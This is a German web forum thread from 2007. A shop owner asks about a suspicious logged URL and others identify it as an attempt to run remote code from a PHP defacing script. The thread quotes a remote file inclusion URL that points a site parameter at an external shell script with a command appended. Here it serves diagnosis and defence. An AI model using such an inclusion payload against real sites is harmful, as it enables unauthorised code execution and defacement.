Angriff ???

muskelfood · #1 (**permalink**) 19.05.2007, 10:17

Seit einiger Zeit habe ich unter "Wer ist Online" immer eine komische IP Adressen:
Z.B:
200.163.252.11 http://www.muskelfood.de/index.php?manu=http://canaldrop.by.ru/cmd/tool25.txt?&cmd=id

Weiß jemand was das zu bedeuten hat?
Mache mir da einige Sorgen zwecks Angriff usw.

Wäre über Hilfe dankbar!
Gruß Mario

fsit99 · #2 (**permalink**) 19.05.2007, 15:43

Zitat:

Zitat von muskelfood

Seit einiger Zeit habe ich unter "Wer ist Online" immer eine komische IP Adressen:
Z.B:
200.163.252.11 http://www.muskelfood.de/index.php?manu=http://canaldrop.by.ru/cmd/tool25.txt?&cmd=id

Weiß jemand was das zu bedeuten hat?
Mache mir da einige Sorgen zwecks Angriff usw.

Wäre über Hilfe dankbar!
Gruß Mario

Hallo
Ja da will einer code aus einer txt-datei bei dir im Web ausführen. Hast Du einen eigenen Server, dann solltest Du mal die Logfiles prüfen, ob er erfolgreich was einspeisen konnte. Wenn du ein Web hast, also Webspace gemietet, wird dein Hoster das prüfen und dem Angreifer aussperren.

Bei weiteren Fragen PM

mfg
oliver

Sebastian05 · #3 (**permalink**) 19.05.2007, 17:57

sollte man sich vieleicht auch sorgen machen wenn man täglich immer und immer wieder die gleiche IP sieht, allerdings nur artikel sich anschaut und sein warenkob, impressum etc....???

entweder kopiert er alles 1zu1 oder ist gerne auf mein shop... aber fragen kost ja nichts

fsit99 · #4 (**permalink**) 19.05.2007, 19:31

Zitat:

Zitat von Sebastian05

sollte man sich vieleicht auch sorgen machen wenn man täglich immer und immer wieder die gleiche IP sieht, allerdings nur artikel sich anschaut und sein warenkob, impressum etc....???

entweder kopiert er alles 1zu1 oder ist gerne auf mein shop... aber fragen kost ja nichts

Schon mal daran gedacht, das es eine Suchmaschine sein kann? Im oben genannten Beispiel ist es keine Suchmaschine, das steht fest.

mfg
oliver

nosebear · #5 (**permalink**) 19.05.2007, 20:53

google spuckt das aus wenn man "tool25.txt" als Suchbegriff eingibt

Zitat:

"Defacing Tool 2.0 by r3v3ng4ns" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface web sites.". In our experience the script is often used to download further malware using wget/curl, or to test for the presence of vulnerable scripts by attempting commands such as 'id' or 'uname'. It seems that the script can also be uploaded to PHP/Apache servers to provide an easily accessible set of utilities for executing commands, searching for files.

Scheint also niemand zu sein, dem deine Seite gefällt..

der Frank

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Möglicherweise Angriff?	bernhard5624	Allgemeine Diskussionen	7	16.08.2006 19:47